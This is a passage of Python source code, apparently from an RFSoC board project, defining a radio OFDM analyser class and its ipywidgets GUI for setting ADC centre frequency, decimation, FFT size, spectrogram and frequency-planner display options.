def __init__(self,
adc_tile,
adc_block,
adc_description,
spectrum_analyser,
ofdm_receiver,
decimator,
inspector):
self._tile = adc_tile
self._block = adc_block
self._spectrum_analyser = spectrum_analyser
self._decimator = decimator
self._ofdm_receiver = ofdm_receiver
self._inspector = inspector
self._adc_description = adc_description
self._ofdm_receiver.reset_synchronisation()
@property
def constellation_enable(self):
if self._inspector.stopped:
return False
else:
return True
@constellation_enable.setter
def constellation_enable(self, enable):
if enable:
self._inspector.start()
else:
self._inspector.stop()
@property
def centre_frequency(self):
return abs(self._block.MixerSettings['Freq'])
@centre_frequency.setter
def centre_frequency(self, centre_frequency):
nyquist_zone = int(np.ceil(centre_frequency/(self._block.BlockStatus['SamplingFreq']*1e3/2)))
if nyquist_zone == 0:
nyquist_zone = 1
if nyquist_zone != self._block.NyquistZone:
self._block.NyquistZone = nyquist_zone
if (nyquist_zone % 2) == 0:
self._block.MixerSettings['Freq'] = centre_frequency
else:
self._block.MixerSettings['Freq'] = -centre_frequency
self._spectrum_analyser.centre_frequency = centre_frequency*1e6
self._block.UpdateEvent(1)
@property
def decimation_factor(self):
if self._decimator.decimation_factor > 0:
return self._block.DecimationFactor * self._decimator.decimation_factor
else:
return self._block.DecimationFactor
@decimation_factor.setter
def decimation_factor(self, decimation_factor):
word_lut = [8, 4, 2]
sel = int(np.log2(decimation_factor))
if decimation_factor in [2, 4, 8]:
self._block.DecimationFactor = decimation_factor
self._block.FabRdVldWords = word_lut[sel-1]
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 4-sel
self._safe_restart()
self._decimator.decimation_factor = 0
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
elif decimation_factor in [16, 32, 64, 128, 256, 512, 1024, 2048]:
self._block.DecimationFactor = 8
self._block.FabRdVldWords = 2
self._spectrum_analyser.ssr_packetsize = 0
self._spectrum_analyser.ssr_mode = 0
self._safe_restart()
self._decimator.decimation_factor = int(decimation_factor/8)
self._spectrum_analyser.sample_frequency = self._block.BlockStatus['SamplingFreq']*1e9
self._spectrum_analyser.decimation_factor = decimation_factor
self._spectrum_analyser.ssr_packetsize = int(self._spectrum_analyser.fft_size/8)
@property
def number_frames(self):
return self._spectrum_analyser.plot.data_windowsize
@number_frames.setter
def number_frames(self, number_frames):
if number_frames in range(1, 65):
self._spectrum_analyser.plot.data_windowsize = int(number_frames)
@property
def sample_frequency(self):
return self._block.BlockStatus['SamplingFreq']*1e9
@property
def calibration_mode(self):
return self._block.CalibrationMode
@calibration_mode.setter
def calibration_mode(self, calibration_mode):
if calibration_mode in [1, 2]:
self._block.CalibrationMode = calibration_mode
self._safe_restart()
@property
def nyquist_stopband(self):
return self._spectrum_analyser.nyquist_stopband * 100
@nyquist_stopband.setter
def nyquist_stopband(self, nyquist_stopband):
self._spectrum_analyser.nyquist_stopband = nyquist_stopband/100
@property
def fftsize(self):
return self._spectrum_analyser.fft_size
@fftsize.setter
def fftsize(self, fftsize):
self._spectrum_analyser.fft_size = fftsize
@property
def spectrum_type(self):
return self._spectrum_analyser.spectrum_type
@spectrum_type.setter
def spectrum_type(self, spectrum_type):
self._spectrum_analyser.spectrum_type = spectrum_type
@property
def spectrum_units(self):
return self._spectrum_analyser.spectrum_units
@spectrum_units.setter
def spectrum_units(self, spectrum_units):
self._spectrum_analyser.spectrum_units = spectrum_units
@property
def window(self):
return self._spectrum_analyser.window
@window.setter
def window(self, window_type):
self._spectrum_analyser.window = window_type
@property
def spectrum_window(self):
return self._spectrum_analyser.spectrum_window
@property
def height(self):
return self._spectrum_analyser.height
@height.setter
def height(self, height):
self._spectrum_analyser.height = height
@property
def width(self):
return self._spectrum_analyser.width
@width.setter
def width(self, width):
self._spectrum_analyser.width = width
@property
def spectrum_enable(self):
return self._spectrum_analyser.plot.enable_updates
@spectrum_enable.setter
def spectrum_enable(self, enable):
if enable:
self._spectrum_analyser.plot.enable_updates = True
else:
self._spectrum_analyser.plot.enable_updates = False
@property
def waterfall_enable(self):
return self._spectrum_analyser.spectrogram.enable_updates
@waterfall_enable.setter
def waterfall_enable(self, enable):
if enable:
self._spectrum_analyser.spectrogram.enable_updates = True
else:
self._spectrum_analyser.spectrogram.enable_updates = False
@property
def dma_enable(self):
return self._spectrum_analyser.dma_enable
@dma_enable.setter
def dma_enable(self, enable):
if enable:
self._spectrum_analyser.dma_enable = 1
self._spectrum_analyser.timer.start()
else:
self._spectrum_analyser.timer.stop()
self._spectrum_analyser.dma_enable = 0
@property
def update_frequency(self):
return self._spectrum_analyser.update_frequency
@update_frequency.setter
def update_frequency(self, update_frequency):
self._spectrum_analyser.update_frequency = update_frequency
@property
def plotly_theme(self):
return self._spectrum_analyser.plotly_theme
@plotly_theme.setter
def plotly_theme(self, plotly_theme):
self._spectrum_analyser.plotly_theme = plotly_theme
self._inspector._c_plot._plot.layout.template = plotly_theme
@property
def line_colour(self):
return self._spectrum_analyser.line_colour
@line_colour.setter
def line_colour(self, line_colour):
self._spectrum_analyser.line_colour = line_colour
@property
def line_fill(self):
return self._spectrum_analyser.line_fill
@line_fill.setter
def line_fill(self, line_fill):
self._spectrum_analyser.line_fill = line_fill
@property
def zmin(self):
return self._spectrum_analyser.zmin
@zmin.setter
def zmin(self, zmin):
self._spectrum_analyser.zmin = zmin
@property
def zmax(self):
return self._spectrum_analyser.zmax
@zmax.setter
def zmax(self, zmax):
self._spectrum_analyser.zmax = zmax
@property
def quality(self):
return self._spectrum_analyser.quality
@quality.setter
def quality(self, quality):
self._spectrum_analyser.quality = quality
@property
def post_process(self):
return self._spectrum_analyser.plot.post_process
@post_process.setter
def post_process(self, post_process):
if post_process in ['max', 'min', 'average', 'median']:
self._spectrum_analyser.plot.post_process = post_process
else:
self._spectrum_analyser.plot.post_process = 'none'
@property
def display_max(self):
return self._spectrum_analyser.plot.display_max
@display_max.setter
def display_max(self, display_max):
self._spectrum_analyser.plot.display_max = display_max
@property
def display_min(self):
return self._spectrum_analyser.plot.display_min
@display_min.setter
def display_min(self, display_min):
self._spectrum_analyser.plot.display_min = display_min
@property
def number_max_indices(self):
return self._spectrum_analyser.plot.number_max_indices
@number_max_indices.setter
def number_max_indices(self, number_max_indices):
self._spectrum_analyser.plot.number_max_indices = number_max_indices
@property
def colour_map(self):
return self._spectrum_analyser.spectrogram.cmap
@colour_map.setter
def colour_map(self, colour_map):
self._spectrum_analyser.spectrogram.cmap = colour_map
@property
def spectrogram_performance(self):
return self._spectrum_analyser.spectrogram.ypixel
@spectrogram_performance.setter
def spectrogram_performance(self, performance):
self._spectrum_analyser.spectrogram.ypixel = performance
@property
def ymin(self):
return self._spectrum_analyser.plot.yrange[0]
@ymin.setter
def ymin(self, ymin):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[0] = ymin
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def ymax(self):
return self._spectrum_analyser.plot.yrange[1]
@ymax.setter
def ymax(self, ymax):
temp_range = list(self._spectrum_analyser.plot.yrange)
temp_range[1] = ymax
self._spectrum_analyser.plot.yrange = tuple(temp_range)
@property
def number_min_indices(self):
return self._spectrum_analyser.plot.number_min_indices
@number_min_indices.setter
def number_min_indices(self, number_min_indices):
self._spectrum_analyser.plot.number_min_indices = number_min_indices
@property
def display_ddc_plan(self):
return self._spectrum_analyser.plot.display_ddc_plan
@display_ddc_plan.setter
def display_ddc_plan(self, display_ddc_plan):
self._spectrum_analyser.plot.display_ddc_plan = display_ddc_plan
@property
def ddc_centre_frequency(self):
return self._spectrum_analyser.plot.ddc_centre_frequency*1e-6
@ddc_centre_frequency.setter
def ddc_centre_frequency(self, ddc_centre_frequency):
self._spectrum_analyser.plot.ddc_centre_frequency = ddc_centre_frequency*1e6
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd2_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd2_db
@ddc_plan_hd2_db.setter
def ddc_plan_hd2_db(self, hd2_db):
self._spectrum_analyser.plot.ddc_plan.hd2_db = hd2_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_hd3_db(self):
return self._spectrum_analyser.plot.ddc_plan.hd3_db
@ddc_plan_hd3_db.setter
def ddc_plan_hd3_db(self, hd3_db):
self._spectrum_analyser.plot.ddc_plan.hd3_db = hd3_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_nsd_db(self):
return self._spectrum_analyser.plot.ddc_plan.nsd_db
@ddc_plan_nsd_db.setter
def ddc_plan_nsd_db(self, nsd_db):
self._spectrum_analyser.plot.ddc_plan.nsd_db = nsd_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_pll_mix_db(self):
return self._spectrum_analyser.plot.ddc_plan.pll_mix_db
@ddc_plan_pll_mix_db.setter
def ddc_plan_pll_mix_db(self, pll_mix_db):
self._spectrum_analyser.plot.ddc_plan.pll_mix_db = pll_mix_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_off_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.off_spur_db
@ddc_plan_off_spur_db.setter
def ddc_plan_off_spur_db(self, off_spur_db):
self._spectrum_analyser.plot.ddc_plan.off_spur_db = off_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def ddc_plan_tis_spur_db(self):
return self._spectrum_analyser.plot.ddc_plan.tis_spur_db
@ddc_plan_tis_spur_db.setter
def ddc_plan_tis_spur_db(self, tis_spur_db):
self._spectrum_analyser.plot.ddc_plan.tis_spur_db = tis_spur_db
self._spectrum_analyser.plot.update_ddc_plan()
@property
def dma_status(self):
return self._spectrum_analyser.dma_status
def spectrum(self):
return self._spectrum_analyser.plot.get_plot()
def waterfall(self):
return self._spectrum_analyser.spectrogram.get_plot()
def reset_ofdm_receiver(self):
self._ofdm_receiver.reset_synchronisation()
def _safe_restart(self):
tile_number = self._adc_description[0]
self._tile.ShutDown()
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
while running:
time.sleep(0.1)
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
self._tile.StartUp()
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
while not running:
time.sleep(0.1)
running = self._tile._parent.IPStatus['ADCTileStatus'][tile_number]['PowerUpState']
#_freq_planner_props = [("enable_rx_alias"),
# ("enable_rx_image"),
# ("enable_nyquist_up"),
# ("enable_nyquist_down"),
# ("enable_hd2"),
# ("enable_hd2_image"),
# ("enable_hd3"),
# ("enable_hd3_image"),
# ("enable_pll_mix_up"),
# ("enable_pll_mix_up_image"),
# ("enable_pll_mix_down"),
# ("enable_pll_mix_down_image"),
# ("enable_tis_spur"),
# ("enable_tis_spur_image"),
# ("enable_offset_spur"),
# ("enable_offset_spur_image")]
#_freq_planner_desc = [("RX Alias"),
# ("RX Image"),
# ("Nyquist Up"),
# ("Nyquist Down"),
# ("HD2"),
# ("HD2 Image"),
# ("HD3"),
# ("HD3 Image"),
# ("PLL Mix Up"),
# ("PLL Mix Up Image"),
# ("PLL Mix Down"),
# ("PLL Mix Down Image"),
# ("TIS Spur"),
# ("TIS Spur Image"),
# ("Offset Spur"),
# ("Offset Spur Image")]
_freq_planner_props = [("enable_rx_alias"),
("enable_rx_image"),
("enable_hd2"),
("enable_hd2_image"),
("enable_hd3"),
("enable_hd3_image"),
("enable_pll_mix_up"),
("enable_pll_mix_up_image"),
("enable_pll_mix_down"),
("enable_pll_mix_down_image")]
_freq_planner_desc = [("Fc"),
("Fc Image"),
("HD2"),
("HD2 Image"),
("HD3"),
("HD3 Image"),
("PLL Mix Up"),
("PLL Mix Up Image"),
("PLL Mix Down"),
("PLL Mix Down Image")]
def _create_mmio_property(idx):
def _get(self):
return self._spectrum_analyser.plot.display_ddc_plan[idx]
def _set(self, value):
if value:
self._spectrum_analyser.plot.display_ddc_plan[idx] = True
else:
self._spectrum_analyser.plot.display_ddc_plan[idx] = False
self._spectrum_analyser.plot.update_ddc_plan()
return property(_get, _set)
for idx, name in enumerate(_freq_planner_props):
setattr(RadioOfdmAnalyser, name, _create_mmio_property(idx))
class RadioOfdmAnalyserGUI():
def __init__(self,
adc_tile,
adc_block,
adc_description,
spectrum_analyser,
decimator,
ofdm_receiver,
inspector):
self._widgets = {}
self._accordions = {}
self._running_update = False
self._update_que = []
self._stopped = False
self._runtime_status = {'spectrum_enable' : False, 'waterfall_enable' : False}
self._inspector = inspector
self.analyser = RadioOfdmAnalyser(adc_tile=adc_tile,
adc_block=adc_block,
adc_description=adc_description,
spectrum_analyser=spectrum_analyser,
decimator=decimator,
ofdm_receiver=ofdm_receiver,
inspector=self._inspector)
self._config = {'centre_frequency' : 819,
'nyquist_stopband' : 80,
'decimation_factor' : self.analyser.decimation_factor,
'calibration_mode' : self.analyser.calibration_mode,
'fftsize' : 2048,
'spectrum_type' : self.analyser.spectrum_type,
'spectrum_units' : self.analyser.spectrum_units,
'window' : 'hanning',
'height' : self.analyser.height,
'spectrum_enable' : self.analyser.spectrum_enable,
'waterfall_enable' : self.analyser.waterfall_enable,
'constellation_enable' : self.analyser.constellation_enable,
'dma_enable' : self.analyser.dma_enable,
'update_frequency' : 10,
'plotly_theme' : self.analyser.plotly_theme,
'line_colour' : self.analyser.line_colour,
'zmin' : self.analyser.zmin,
'zmax' : self.analyser.zmax,
'quality' : self.analyser.quality,
'width' : self.analyser.width,
'post_process' : 'average',
'number_frames' : 6,
'display_max' : False,
'display_min' : False,
'number_max_indices' : 1,
'number_min_indices' : 1,
'colour_map' : self.analyser.colour_map,
'spectrogram_performance' : 4,
'ymin' : self.analyser.ymin,
'ymax' : self.analyser.ymax,
'enable_rx_alias' : False,
'enable_rx_image' : False,
'enable_hd2' : False,
'enable_hd2_image' : False,
'enable_hd3' : False,
'enable_hd3_image' : False,
'enable_pll_mix_up' : False,
'enable_pll_mix_up_image' : False,
'enable_pll_mix_down' : False,
'enable_pll_mix_down_image' : False,
'ddc_centre_frequency' : 0,
'ddc_plan_hd2_db' : self.analyser.ddc_plan_hd2_db,
'ddc_plan_hd3_db' : self.analyser.ddc_plan_hd3_db,
'ddc_plan_nsd_db' : self.analyser.ddc_plan_nsd_db,
'ddc_plan_pll_mix_db' : self.analyser.ddc_plan_pll_mix_db,
'ddc_plan_off_spur_db' : self.analyser.ddc_plan_off_spur_db,
'ddc_plan_tis_spur_db' : self.analyser.ddc_plan_tis_spur_db}
self._initialise_frontend()
@property
def config(self):
return self._config
@config.setter
def config(self, config_dict):
self._update_config(config_dict)
def start(self):
self.config = {'spectrum_enable' : self._runtime_status['spectrum_enable'],
'waterfall_enable' : self._runtime_status['waterfall_enable']}
self._stopped = False
def stop(self):
if not self._stopped:
self._runtime_status.update({'spectrum_enable' : self._config['spectrum_enable'],
'waterfall_enable' : self._config['waterfall_enable']})
self.config = {'spectrum_enable' : False,
'waterfall_enable' : False}
self._stopped = True
def _initialise_frontend(self):
self._widgets.update({'ddc_centre_frequency' :
FloatText(callback=self._update_config,
value=self._config['ddc_centre_frequency'],
min_value=0,
max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
step=1,
dict_id='ddc_centre_frequency',
description='Centre Frequency (MHz):')})
self._widgets.update({'ddc_plan_hd2_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_hd2_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_hd2_db',
description='HD2 (dB)')})
self._widgets.update({'ddc_plan_hd3_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_hd3_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_hd3_db',
description='HD3 (dB)')})
self._widgets.update({'ddc_plan_nsd_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_nsd_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_nsd_db',
description='NSD (dBFs/Hz)')})
self._widgets.update({'ddc_plan_pll_mix_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_pll_mix_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_pll_mix_db',
description='PLL Ref Mixing (dB)')})
self._widgets.update({'ddc_plan_off_spur_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_off_spur_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_off_spur_db',
description='Offset Spur (dB)')})
self._widgets.update({'ddc_plan_tis_spur_db' :
FloatText(callback=self._update_config,
value=self._config['ddc_plan_tis_spur_db'],
min_value=-300,
max_value=300,
step=1,
dict_id='ddc_plan_tis_spur_db',
description='TI Spur (dB)')})
for idx, freq_prop in enumerate(_freq_planner_props):
self._widgets.update({freq_prop :
CheckBox(callback=self._update_config,
description=_freq_planner_desc[idx],
value=self._config[freq_prop],
indent=False,
layout_width='150px',
dict_id=freq_prop)})
self._widgets.update({'decimation_factor' :
DropDown(callback=self._update_config,
options=[2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048],
value=self._config['decimation_factor'],
dict_id='decimation_factor',
description='Decimation Factor:')})
self._widgets.update({'spectrum_type' :
DropDown(callback=self._update_config,
options=[('Power Spectrum'),
('Power Spectral Density')],
value=self._config['spectrum_type'],
dict_id='spectrum_type',
description='Spectrum Type:',
description_width='100px')})
self._widgets.update({'spectrum_units' :
DropDown(callback=self._update_config,
options=[('dBW'),
('dBm')],
value=self._config['spectrum_units'],
dict_id='spectrum_units',
description='Spectrum Units:',
description_width='100px')})
self._widgets.update({'post_process' :
DropDown(callback=self._update_config,
options=[('None', 'none'),
('Maximum Hold', 'max'),
('Minimum Hold', 'min'),
('Running Average', 'average'),
('Running Median', 'median')],
value=self._config['post_process'],
dict_id='post_process',
description='Post Processing:',
description_width='100px')})
self._widgets.update({'fftsize' :
DropDown(callback=self._update_config,
options=[64, 128, 256, 512, 1024, 2048, 4096, 8192],
value=4096,
dict_id='fftsize',
description = 'FFT Size:')})
self._widgets.update({'calibration_mode' :
DropDown(callback=self._update_config,
options=[('1 (Fs/2 ≤ ±30%)', 1),
('2 (Fs/2 > ±30%)', 2)],
value=self._config['calibration_mode'],
dict_id='calibration_mode',
description='Calibration Mode:')})
self._widgets.update({'window' :
DropDown(callback=self._update_config,
options=[('Rectangular', 'rectangular'),
('Bartlett', 'bartlett'),
('Blackman', 'blackman'),
('Hamming', 'hamming'),
('Hanning', 'hanning')],
value='rectangular',
dict_id='window',
description='')})
self._widgets.update({'plotly_theme' :
DropDown(callback=self._update_config,
options=[('Seaborn', 'seaborn'),
('Simple White', 'simple_white'),
('Plotly', 'plotly'),
('Plotly White', 'plotly_white'),
('Plotly Dark', 'plotly_dark')],
value='plotly',
dict_id='plotly_theme',
description='Plotly Theme:')})
self._widgets.update({'colour_map' :
DropDown(callback=self._update_config,
options=[('Grey' , 'gray'),
('Spring' , 'spring'),
('Summer' , 'summer'),
('Autumn' , 'autumn'),
('Winter' , 'winter'),
('Cool' , 'cool'),
('Hot' , 'hot'),
('Copper' , 'copper'),
('Rainbow', 'rainbow'),
('Jet' , 'jet')],
value='gray',
dict_id='colour_map',
description='Colour Map:',
description_width='100px')})
self._widgets.update({'line_colour' :
DropDown(callback=self._update_config,
options=list(mcolors.CSS4_COLORS),
value='white',
dict_id='line_colour',
description='Line Colour:')})
self._widgets.update({'line_fill' :
DropDown(callback=self._update_config,
options=list(mcolors.CSS4_COLORS),
value='lightpink',
dict_id='line_fill',
description='Line Fill:')})
self._widgets.update({'spectrogram_performance' :
DropDown(callback=self._update_config,
options=[('Low', 8),
('Medium', 4),
('High', 2)],
value=2,
dict_id='spectrogram_performance',
description='Resolution:',
description_width='100px')})
self._widgets.update({'number_max_indices' :
IntText(callback=self._update_config,
value=self._config['number_max_indices'],
min_value=1,
max_value=64,
step=1,
dict_id='number_max_indices',
description='Number of Maximums:')})
self._widgets.update({'number_min_indices' :
IntText(callback=self._update_config,
value=self._config['number_min_indices'],
min_value=1,
max_value=64,
step=1,
dict_id='number_min_indices',
description='Number of Minimums:')})
self._widgets.update({'number_frames' :
FloatText(callback=self._update_config,
value=self._config['number_frames'],
min_value=1,
max_value=64,
step=1,
dict_id='number_frames',
description='Number Frames:',
description_width='100px')})
self._widgets.update({'ymin' :
FloatText(callback=self._update_config,
value=self._config['ymin'],
min_value=-300,
max_value=300,
step=1,
dict_id='ymin',
description='Y-Low (dB):',
description_width='100px')})
self._widgets.update({'ymax' :
FloatText(callback=self._update_config,
value=self._config['ymax'],
min_value=-300,
max_value=300,
step=1,
dict_id='ymax',
description='Y-High (dB):',
description_width='100px')})
self._widgets.update({'centre_frequency' :
FloatText(callback=self._update_config,
value=self._config['centre_frequency'],
min_value=0,
max_value=self.analyser._block.BlockStatus['SamplingFreq']*1e3,
step=1,
dict_id='centre_frequency',
description='Centre Frequency (MHz):')})
self._widgets.update({'nyquist_stopband' :
FloatText(callback=self._update_config,
value=self._config['nyquist_stopband'],
min_value=50,
max_value=100,
step=1,
dict_id='nyquist_stopband',
description='Nyquist Stopband (%):')})
self._widgets.update({'height' :
FloatText(callback=self._update_config,
value=self._config['height'],
min_value=200,
max_value=2160,
step=1,
dict_id='height',
description='Plot Height (Px):')})
self._widgets.update({'width' :
FloatText(callback=self._update_config,
value=self._config['width'],
min_value=400,
max_value=4096,
step=1,
dict_id='width',
description='Plot Width (Px):')})
#self._widgets.update({'update_frequency' :
# FloatText(callback=self._update_config,
# value=self._config['update_frequency'],
# min_value=5,
# max_value=12,
# step=1,
# dict_id='update_frequency',
# description='Update Frequency:')})
self._widgets.update({'update_frequency' :
DropDown(callback=self._update_config,
options=[('Low', 5),
('Medium', 10),
('High', 15)],
value=5,
dict_id='update_frequency',
description='Plot Performance:')})
self._widgets.update({'zmin' :
FloatText(callback=self._update_config,
value=self._config['zmin'],
min_value=-300,
max_value=300,
step=1,
dict_id='zmin',
description='Z-Low (dB):',
description_width='100px')})
self._widgets.update({'zmax' :
FloatText(callback=self._update_config,
value=self._config['zmax'],
min_value=-300,
max_value=300,
step=1,
dict_id='zmax',
description='Z-High (dB):',
description_width='100px')})
self._widgets.update({'quality' :
FloatText(callback=self._update_config,
value=self._config['quality'],
min_value=80,
max_value=100,
step=1,
dict_id='quality',
description='Quality (%):',
description_width='100px')})
self._widgets.update({'constellation_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='constellation_enable')})
self._widgets.update({'dma_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='dma_enable')})
self._widgets.update({'spectrum_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='spectrum_enable')})
self._widgets.update({'waterfall_enable' :
Button(callback=self._update_config,
description_on = 'On',
description_off = 'Off',
state=False,
dict_id='waterfall_enable')})
self._widgets.update({'reset_ofdm_receiver' :
QuickButton(callback=self.analyser.reset_ofdm_receiver,
description_on = 'Resetting',
description_off = 'Reset',
state=False,
dict_id='reset_ofdm_receiver')})
self._widgets.update({'sample_frequency_label' :
Label(value=str((self.analyser.sample_frequency/self.analyser.decimation_factor)*1e-6),
svalue='Sample Frequency: ',
evalue=' MHz',
dict_id='sample_frequency_label')})
self._widgets.update({'resolution_bandwidth_label' :
Label(value=str(((self.analyser.sample_frequency/self.analyser.decimation_factor)/ \
self.analyser.fftsize)*1e-3),
svalue='Frequency Resolution: ',
evalue=' kHz',
dict_id='resolution_bandwidth_label')})
self._widgets.update({'display_max' :
CheckBox(callback=self._update_config,
description='Display Maximum',
value=self._config['display_max'],
dict_id='display_max')})
self._widgets.update({'display_min' :
CheckBox(callback=self._update_config,
description='Display Minimum',
value=self._config['display_min'],
dict_id='display_min')})
self._window_plot = go.FigureWidget(layout={'hovermode' : 'closest',
'height' : 225,
'width' : 300,
'margin' : {
't':0, 'b':20, 'l':0, 'r':0
},
'showlegend' : False,
},
data=[{
'x': np.arange(self.analyser.fftsize),
'y': np.ones(self.analyser.fftsize),
'line':{
'color' : 'palevioletred',
'width' : 2
},
'fill' : 'tozeroy',
'fillcolor' : 'rgba(128, 128, 128, 0.5)'
}])
self._accordions.update({'properties' :
ipw.Accordion(children=[ipw.HBox(
[ipw.VBox([ipw.Label(value='Spectrum Analyzer: ', layout=ipw.Layout(width='150px')),
ipw.Label(value='Spectrogram: ', layout=ipw.Layout(width='150px'))]),
ipw.VBox([self._widgets['spectrum_enable'].get_widget(),
self._widgets['waterfall_enable'].get_widget()])],
layout=ipw.Layout(justify_content='space-around')),
ipw.VBox([self._widgets['centre_frequency'].get_widget(),
self._widgets['decimation_factor'].get_widget(),
self._widgets['fftsize'].get_widget()]),
ipw.VBox([self._widgets['post_process'].get_widget(),
self._widgets['number_frames'].get_widget(),
self._widgets['spectrum_type'].get_widget(),
self._widgets['spectrum_units'].get_widget(),
self._widgets['ymin'].get_widget(),
self._widgets['ymax'].get_widget()]),
ipw.VBox([ipw.Label(value='Experimental Control Panel'),
self._widgets['ddc_centre_frequency'].get_widget(),
ipw.HBox([
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
])
]),
ipw.VBox([self._widgets['spectrogram_performance'].get_widget(),
self._widgets['colour_map'].get_widget(),
self._widgets['zmin'].get_widget(),
self._widgets['zmax'].get_widget()]),
ipw.VBox([self._window_plot,
self._widgets['window'].get_widget()]),
ipw.VBox([self._widgets['nyquist_stopband'].get_widget(),
self._widgets['height'].get_widget(),
self._widgets['width'].get_widget(),
self._widgets['update_frequency'].get_widget()])
])})
""" Frequency Planner Widgets
ipw.VBox([self._widgets['ddc_centre_frequency'].get_widget(),
self._widgets['ddc_plan_hd2_db'].get_widget(),
self._widgets['ddc_plan_hd3_db'].get_widget(),
self._widgets['ddc_plan_pll_mix_db'].get_widget(),
self._widgets['ddc_plan_off_spur_db'].get_widget(),
self._widgets['ddc_plan_tis_spur_db'].get_widget(),
self._widgets['ddc_plan_nsd_db'].get_widget(),
ipw.HBox([
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(0,int(len(_freq_planner_props)/2))]),
ipw.VBox([self._widgets[_freq_planner_props[i]].get_widget() for i in range(int(len(_freq_planner_props)/2),len(_freq_planner_props))])
])
]),
"""
self._accordions['properties'].set_title(0, 'System')
self._accordions['properties'].set_title(1, 'Receiver')
self._accordions['properties'].set_title(2, 'Spectrum Analyzer')
self._accordions['properties'].set_title(3, 'Frequency Planner')
self._accordions['properties'].set_title(4, 'Spectrogram')
self._accordions['properties'].set_title(5, 'Window Settings')
self._accordions['properties'].set_title(6, 'Plot Settings')
"""The transmit system accordion"""
self._accordions.update({'constellation_properties' :
ipw.Accordion(children=[ipw.HBox([ipw.VBox([ipw.Label(value='Constellation: ', layout=ipw.Layout(width='150px')),
ipw.Label(value='Reset Receiver: ', layout=ipw.Layout(width='150px'))]),
ipw.VBox([self._widgets['constellation_enable'].get_widget(),
self._widgets['reset_ofdm_receiver'].get_widget()])],
layout=ipw.Layout(justify_content='space-around'))],
layout=ipw.Layout(justify_content='flex-start',
width='initial'))})
self._accordions['constellation_properties'].set_title(0, 'System')
self._update_config(self._config)
def _update_config(self, config_dict):
for key in config_dict.keys():
if key not in self._config:
raise KeyError(''.join(['Key ', str(key), ' not in dictionary.']))
self._config.update(config_dict)
self._update_que.append(config_dict.keys())
if not self._running_update:
self._running_update = True
self._update_frontend()
def _update_frontend(self):
if self._update_que:
plot_running = self._config['spectrum_enable']
self.analyser.spectrum_enable = False
while self.analyser.dma_status != 32:
time.sleep(0.1)
while self._running_update:
keys = self._update_que.pop(0)
for key in keys:
if key in self._config:
if key in ['centre_frequency', 'decimation_factor', 'quality']:
self._widgets['waterfall_enable'].value = False
self.analyser.waterfall_enable = False
setattr(self.analyser, key, self._config[key])
self._widgets[key].value = self._config[key]
if key in ['plotly_theme', 'line_colour', 'decimation_factor',
'spectrum_enable', 'waterfall_enable']:
self._update_widgets(key)
if key in ['fftsize', 'window']:
self._update_figurewidgets(key)
self._update_textwidgets()
time.sleep(0.2)
if not self._update_que:
self.analyser.spectrum_enable = plot_running
self._running_update = False
self._running_update = False
def _update_textwidgets(self):
self._widgets['sample_frequency_label'].value = str((self.analyser.sample_frequency/ \
self.analyser.decimation_factor)*1e-6)
self._widgets['resolution_bandwidth_label'].value = str(((self.analyser.sample_frequency/ \
self.analyser.decimation_factor)/self.analyser.fftsize)*1e-3)
def _update_figurewidgets(self, key):
if key in ['fftsize']:
self._window_plot.data[0].x = np.arange(self.analyser.fftsize)
self._window_plot.data[0].y = self.analyser.spectrum_window
elif key in ['window']:
self._window_plot.data[0].y = self.analyser.spectrum_window
def _update_widgets(self, key):
if key in ['line_colour']:
self._window_plot.data[0].line.color = self._config['line_colour']
self._widgets['dma_enable'].button_colour = self._config['line_colour']
self._widgets['spectrum_enable'].button_colour = self._config['line_colour']
self._widgets['waterfall_enable'].button_colour = self._config['line_colour']
self._widgets['constellation_enable'].button_colour = self._config['line_colour']
self._widgets['reset_ofdm_receiver'].button_colour = self._config['line_colour']
elif key in ['plotly_theme']:
self._window_plot.layout.template = self._config['plotly_theme']
elif key in ['decimation_factor']:
step_list = [10, 1, 1, 1, 0.1, 0.1, 0.1, 0.01, 0.01, 0.01, 0.001]
self._widgets['centre_frequency'].step = step_list[int(np.log2(self._config['decimation_factor']) - 1)]
elif key in ['spectrum_enable']:
if self._config['spectrum_enable']:
self._widgets['dma_enable'].configure_state(True)
else:
if not self._config['waterfall_enable']:
